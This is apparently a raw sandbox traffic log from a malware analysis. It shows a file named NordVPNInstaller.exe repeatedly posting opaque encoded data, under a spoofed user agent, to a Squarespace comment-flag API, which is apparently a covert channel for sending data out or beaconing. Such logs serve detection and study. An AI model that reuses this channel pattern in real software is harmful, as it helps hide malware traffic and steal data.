2024-09-01 19:56:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:35 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZ-Btbh3rIl6Njc5YWM1M2VhOWMxMjRmMGE1ODQ5NmIwNjYwMDZl; Path=/; Secure Set-Cookie: crumb=BbvT4wwvMMYsYTNhZmViZTA4YWE3ZjQ2Y2M4NDY1ODRjNGZlMTY2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: RiVzMiQj/YwM4ONsx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbvT4wwvMMYsYTNhZmViZTA4YWE3ZjQ2Y2M4NDY1ODRjNGZlMTY2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49810	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:35 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:35 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 65 55 6b 55 5a 66 50 61 55 57 30 72 79 6d 43 63 5a 6a 77 6e 6c 35 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjeUkUZfPaUW0rymCcZjwnl5IwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRcBWhEm-NSgMDdiN2UwMjIzM2Y0OGEyNzg0MWNhN2FlY2Y4NGFk; Path=/; Secure Set-Cookie: crumb=BReD9q47oXvFYWI1OWRkOTFkOGIxMWY0NzE1Mjc5YThiODRhY2Ey; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SakBYNUG/6tdZo5Bu Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BReD9q47oXvFYWI1OWRkOTFkOGIxMWY0NzE1Mjc5YThiODRhY2Ey"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49812	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:35 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:35 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Ba_5K9jQ5xOeMWU2MmQxOTRjMWQwMmFiM2RkNDNjNWE3YjVhYmYz; Path=/; Secure Set-Cookie: crumb=BXmIvFndjSnmNTJlYzcyNjA0ZmRjZDIzZjRkMTcxZDg0NTJiNzNk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: KWmixmAi/GuKwLZf5 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXmIvFndjSnmNTJlYzcyNjA0ZmRjZDIzZjRkMTcxZDg0NTJiNzNk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49813	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:35 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:35 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSIqV9t5qImmZGI4ZGYwM2QwOGY3YjBjZjg2NTc2ZmNkOGNiMzIz; Path=/; Secure Set-Cookie: crumb=BXxLWqTXi23oZWNkMWE4MzM0ZGU4YmYwMTY1MGNiODRhZThiMWVh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: YInZnnku/jmKfCdGA Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXxLWqTXi23oZWNkMWE4MzM0ZGU4YmYwMTY1MGNiODRhZThiMWVh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49814	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:36 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:36 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:36 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:36 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:36 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVivQQWyilUqMWQ3MmUyMTY5OWQyOGNiZjMzNjViMWZmYzU3MDRk; Path=/; Secure Set-Cookie: crumb=BXFPBNRBlZorNDMyNGYwODUyMThkZTdmOTMyNTdhNTM1ZGJmOWM5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: rSnjixMq/nvuNQ0pl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXFPBNRBlZorNDMyNGYwODUyMThkZTdmOTMyNTdhNTM1ZGJmOWM5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49815	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:36 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:36 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:36 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:36 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:36 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Ba6ks2qsyxkINmU4N2U4MjI2NzU0YTQzZmE1Yjk5Yjg0OTE5NDM0; Path=/; Secure Set-Cookie: crumb=BafgAjuPEOktZmFkYzNjNzdhZjc2NGIyMjA5NzljODcxNDc3N2I5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: O1tdbWyW/BnUodzQB Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BafgAjuPEOktZmFkYzNjNzdhZjc2NGIyMjA5NzljODcxNDc3N2I5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49817	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:37 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:37 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:37 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:37 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:37 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVpI7TRF5lHPZDU4Mzk0NDgzNDM0NTFiMTZjMmEwNzRmMTJjMjM0; Path=/; Secure Set-Cookie: crumb=Be3NrVz80wXWNTA3ZWM5ZjIwNzc1ZjFmOTIyNDU4ODhkMTg1Y2Ux; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BechW2tJ/iZhhpIaa Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Be3NrVz80wXWNTA3ZWM5ZjIwNzc1ZjFmOTIyNDU4ODhkMTg1Y2Ux"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49818	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:37 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:37 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:37 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:37 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:37 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bbq9snY5azCeZmJjMDhhMDYzMmEyMTBmMWMwN2RiNTcwNzNkNjIy; Path=/; Secure Set-Cookie: crumb=BacGNDZfc02cN2Q3YTUzZDBmOTdiNzY0MTRiZjI4MDUxYjdjZjZm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: f1Hs4sbL/fHqhm5QZ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BacGNDZfc02cN2Q3YTUzZDBmOTdiNzY0MTRiZjI4MDUxYjdjZjZm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49821	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:38 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:38 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:38 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:38 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:38 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcjJzssDd164NDU2ODhkNDkyOTBkZjA1ZGQ3NWYzMjE3YTU5MDFi; Path=/; Secure Set-Cookie: crumb=BdTV8ZE4JNFyODEyZTExYzc4ZGExZjMyNzE1NTEzZWUzMGFhYzBi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ripJK6XC/ZVQpY72v Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdTV8ZE4JNFyODEyZTExYzc4ZGExZjMyNzE1NTEzZWUzMGFhYzBi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49822	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:38 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
